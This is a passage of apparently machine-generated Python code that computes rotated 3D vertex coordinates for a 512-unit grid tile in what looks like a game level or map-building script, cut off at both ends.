z11 = level*448 + 0
x12 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[0])
y12 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[1])
z12 = level*448 + 64
x13 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 180)[0])
y13 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 180)[1])
z13 = level*448 + 64
x14 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[0])
y14 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[1])
z14 = level*448 + 64
x15 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[0])
y15 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[1])
z15 = level*448 + 0
x16 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[0])
y16 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[1])
z16 = level*448 + 0
x17 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[0])
y17 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[1])
z17 = level*448 + 0
x18 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[0])
y18 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 180)[1])
z18 = level*448 + 64
x19 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 180)[0])
y19 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 180)[1])
z19 = level*448 + 64
x20 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[0])
y20 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[1])
z20 = level*448 + 64
x21 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[0])
y21 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[1])
z21 = level*448 + 309
x22 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 180)[0])
y22 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 180)[1])
z22 = level*448 + 64
x23 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[0])
y23 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[1])
z23 = level*448 + 64
x24 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[0])
y24 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[1])
z24 = level*448 + 309
x25 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 180)[0])
y25 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 180)[1])
z25 = level*448 + 309
x26 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[0])
y26 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[1])
z26 = level*448 + 309
x27 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 180)[0])
y27 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 180)[1])
z27 = level*448 + 309
x28 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[0])
y28 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[1])
z28 = level*448 + 64
x29 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 180)[0])
y29 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 180)[1])
z29 = level*448 + 64
x30 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[0])
y30 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[1])
z30 = level*448 + 64
x31 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[0])
y31 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[1])
z31 = level*448 + 64
x32 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 180)[0])
y32 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 180)[1])
z32 = level*448 + 64
x33 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 180)[0])
y33 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 180)[1])
z33 = level*448 + 309
x34 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[0])
y34 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[1])
z34 = level*448 + 309
x35 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[0])
y35 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 180)[1])
z35 = level*448 + 64
x36 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[0])
y36 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 180)[1])
z36 = level*448 + 64
x37 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[0])
y37 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[1])
z37 = level*448 + 309
x38 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[0])
y38 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 180)[1])
z38 = level*448 + 64
x39 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 180)[0])
y39 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 180)[1])
z39 = level*448 + 64
x40 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 180)[0])
y40 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 180)[1])
z40 = level*448 + 64
x41 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[0])
y41 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[1])
z41 = level*448 + 64
x42 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[0])
y42 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[1])
z42 = level*448 + 320
x43 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 180)[0])
y43 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 180)[1])
z43 = level*448 + 64
x44 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[0])
y44 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[1])
z44 = level*448 + 64
x45 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[0])
y45 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[1])
z45 = level*448 + 320
x46 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 180)[0])
y46 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 180)[1])
z46 = level*448 + 320
x47 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[0])
y47 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[1])
z47 = level*448 + 320
x48 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 180)[0])
y48 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 180)[1])
z48 = level*448 + 320
x49 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[0])
y49 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[1])
z49 = level*448 + 64
x50 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 180)[0])
y50 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 180)[1])
z50 = level*448 + 64
x51 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[0])
y51 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[1])
z51 = level*448 + 64
x52 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[0])
y52 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[1])
z52 = level*448 + 320
x53 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[0])
y53 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 180)[1])
z53 = level*448 + 64
x54 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 180)[0])
y54 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 180)[1])
z54 = level*448 + 64
x55 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[0])
y55 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[1])
z55 = level*448 + 320
x56 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[0])
y56 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 180)[1])
z56 = level*448 + 64
x57 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 180)[0])
y57 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 180)[1])
z57 = level*448 + 64
x58 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y58 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z58 = level*448 + 309
x59 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y59 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z59 = level*448 + 64
x60 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 180)[0])
y60 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 180)[1])
z60 = level*448 + 64
x61 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 180)[0])
y61 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 180)[1])
z61 = level*448 + 64
x62 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y62 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z62 = level*448 + 64
x63 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y63 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z63 = level*448 + 309
x64 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y64 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z64 = level*448 + 309
x65 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y65 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z65 = level*448 + 64
x66 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y66 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z66 = level*448 + 64
x67 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 180)[0])
y67 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 180)[1])
z67 = level*448 + 309
x68 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y68 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z68 = level*448 + 309
x69 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y69 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z69 = level*448 + 309
x70 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 180)[0])
y70 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 180)[1])
z70 = level*448 + 64
x71 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y71 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z71 = level*448 + 64
x72 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y72 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z72 = level*448 + 64
x73 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 180)[0])
y73 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 180)[1])
z73 = level*448 + 309
x74 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 180)[0])
y74 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 180)[1])
z74 = level*448 + 64
x75 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 180)[0])
y75 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 180)[1])
z75 = level*448 + 64
x76 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y76 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z76 = level*448 + 309
x77 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y77 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z77 = level*448 + 64
x78 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[0])
y78 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[1])
z78 = level*448 + 64
x79 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[0])
y79 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[1])
z79 = level*448 + 64
x80 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y80 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z80 = level*448 + 64
x81 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y81 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z81 = level*448 + 309
x82 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y82 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z82 = level*448 + 309
x83 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[0])
y83 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[1])
z83 = level*448 + 309
x84 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[0])
y84 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[1])
z84 = level*448 + 309
x85 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[0])
y85 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[1])
z85 = level*448 + 64
x86 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[0])
y86 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 180)[1])
z86 = level*448 + 64
x87 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[0])
y87 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[1])
z87 = level*448 + 64
x88 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[0])
y88 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[1])
z88 = level*448 + 309
x89 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[0])
y89 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[1])
z89 = level*448 + 64
x90 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[0])
y90 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[1])
z90 = level*448 + 64
x91 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[0])
y91 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[1])
z91 = level*448 + 64
x92 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y92 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z92 = level*448 + 64
x93 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y93 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z93 = level*448 + 309
x94 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[0])
y94 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[1])
z94 = level*448 + 309
x95 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[0])
y95 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[1])
z95 = level*448 + 64
x96 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[0])
y96 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[1])
z96 = level*448 + 64
x97 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y97 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z97 = level*448 + 309
x98 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y98 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z98 = level*448 + 64
x99 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[0])
y99 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[1])
z99 = level*448 + 64
x100 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[0])
y100 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[1])
z100 = level*448 + 309
x101 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[0])
y101 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 180)[1])
z101 = level*448 + 64
x102 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[0])
y102 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[1])
z102 = level*448 + 64
x103 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[0])
y103 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 180)[1])
z103 = level*448 + 309
x104 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[0])
y104 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[1])
z104 = level*448 + 309
x105 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[0])
y105 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[1])
z105 = level*448 + 309
x106 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[0])
y106 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 180)[1])
z106 = level*448 + 64
x107 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[0])
y107 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[1])
z107 = level*448 + 64
x108 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[0])
y108 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[1])
z108 = level*448 + 64
x109 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[0])
y109 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[1])
z109 = level*448 + 309
x110 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[0])
y110 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[1])
z110 = level*448 + 64
x111 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[0])
y111 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[1])
z111 = level*448 + 64
x112 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 180)[0])
y112 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 180)[1])
z112 = level*448 + 64
x113 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[0])
y113 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[1])
z113 = level*448 + 64
x114 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[0])
y114 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[1])
z114 = level*448 + 309
x115 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[0])
y115 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[1])
z115 = level*448 + 64
x116 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[0])
y116 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[1])
z116 = level*448 + 64
x117 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[0])
y117 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[1])
z117 = level*448 + 309
x118 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[0])
y118 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[1])
z118 = level*448 + 309
x119 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[0])
y119 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[1])
z119 = level*448 + 64
x120 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[0])
y120 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[1])
z120 = level*448 + 64
x121 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[0])
